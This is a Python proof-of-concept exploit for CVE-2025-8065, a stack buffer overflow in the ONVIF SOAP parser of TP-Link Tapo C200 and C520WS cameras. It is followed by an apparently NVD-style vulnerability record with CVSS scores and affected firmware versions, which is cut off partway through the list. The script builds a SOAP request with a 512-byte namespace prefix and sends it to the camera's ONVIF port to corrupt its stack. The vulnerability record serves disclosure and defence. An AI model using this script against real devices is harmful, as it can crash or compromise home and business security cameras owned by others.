CVE-2025-8065

import socket # CVE-2025-8065 PoC - Tapo C200/C520WS ONVIF SOAP XML Parser Stack Buffer Overflow # Target: TP-Link Tapo C200 v3 or C520WS v2.6 # Attack Vector: Adjacent Network (requires same L2 network) # Authentication: None required TARGET_IP = "192.168.1.100" TARGET_PORT = 2020 # ONVIF service port # Generate malicious SOAP request with oversized namespace prefix # The prefix exceeds the fixed buffer size in the XML parser def generate_malicious_soap(): # Create a namespace prefix that overflows the stack buffer # Typical buffer size might be 64-128 bytes, so use 256+ bytes overflow_prefix = "A" * 512 soap_body = f'''<?xml version="1.0" encoding="UTF-8"?> <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:{overflow_prefix}="http://www.onvif.org/ver10/device/wsdl"> <soap:Header> <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"> <wsse:UsernameToken> <wsse:Username>admin</wsse:Username> <wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">test</wsse:Password> </wsse:UsernameToken> </wsse:Security> </soap:Header> <soap:Body> <GetDeviceInformation xmlns="http://www.onvif.org/ver10/device/wsdl"/> </soap:Body> </soap:Envelope>''' return soap_body def exploit(): print(f"[*] Targeting {TARGET_IP}:{TARGET_PORT}") print("[*] Generating malicious SOAP request...") soap_request = generate_malicious_soap() # Send the malicious request sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) try: sock.connect((TARGET_IP, TARGET_PORT)) print("[*] Connected to target") # Send HTTP POST with SOAP body http_request = f"POST /onvif/device_service HTTP/1.1\r\n" http_request += f"Host: {TARGET_IP}:{TARGET_PORT}\r\n" http_request += "Content-Type: application/soap+xml; charset=utf-8\r\n" http_request += f"Content-Length: {len(soap_request)}\r\n" http_request += "\r\n" http_request += soap_request sock.send(http_request.encode()) print("[*] Malicious request sent") # Receive response response = sock.recv(4096) print(f"[*] Response received: {response[:200]}") except Exception as e: print(f"[!] Error: {e}") finally: sock.close() if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-8065", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2025-12-20T01:16:05.410", "lastModified": "2026-04-03T17:16:41.710", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack-based buffer overflow vulnerability was identified in the ONVIF SOAP XML Parser in Tapo C200 v3 and C520WS v2.6. When processing XML tags with namespace prefixes, the parser fails to validate the prefix length before copying it to a fixed-size stack buffer. It allowed a crafted SOAP request with an oversized namespace prefix to cause memory corruption in stack. \n\nAn unauthenticated attacker on the same local network may exploit this flaw to enable remote code execution with elevated privileges, leading to full compromise of the device."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.3:build_230228:*:*:*:*:*:*", "matchCriteriaId": "CABD8DE6-9904-499D-919F-9DBD42BE6762"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.4:build_230424:*:*:*:*:*:*", "matchCriteriaId": "254031B5-7CC7-4B9D-970B-FAA6EBC3EAFD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.5:build_230717:*:*:*:*:*:*", "matchCriteriaId": "9D61B481-8262-44D4-9A1D-9967AB1805DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.7:build_230920:*:*:*:*:*:*", "matchCriteriaId": "50D2F368-F8C8-41E1-9360-8CDF9F89E566"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.9:build_231019:*:*:*:*:*:*", "matchCriteriaId": "EF80958C-4274-4DEA-9730-176E3E6F21F2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.11:build_231115:*:*:*:*:*:*", "matchCriteriaId": "7AA1B7FA-D418-46B2-A530-BF67E550E38F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.13:build_240327:*:*:*:*:*:*", "matchCriteriaId": "DC4382B5-C7EC-4B98-AF28-8D08D0771133"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.14:build_240513:*:*:*:*:*:*", "matchCriteriaId": "1FCE1F5E-E84B-4CF4-B8A4-7A3448A0D127"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.15:build_240715:*:*:*:*:*:*", "matchCriteriaId": "C05AC5C2-5BB7-499A-AE2B-414103317D47"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.4.1:build_241212:*:*:*:*:*:*", "matchCriteriaId": "C1ED28D6-9441-440A-81D8-EB539D50BB56"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.4.2:build_250313:*:*:*:*:*:*", "matchCriteriaId": "51E28752-8B46-48C ... (truncated)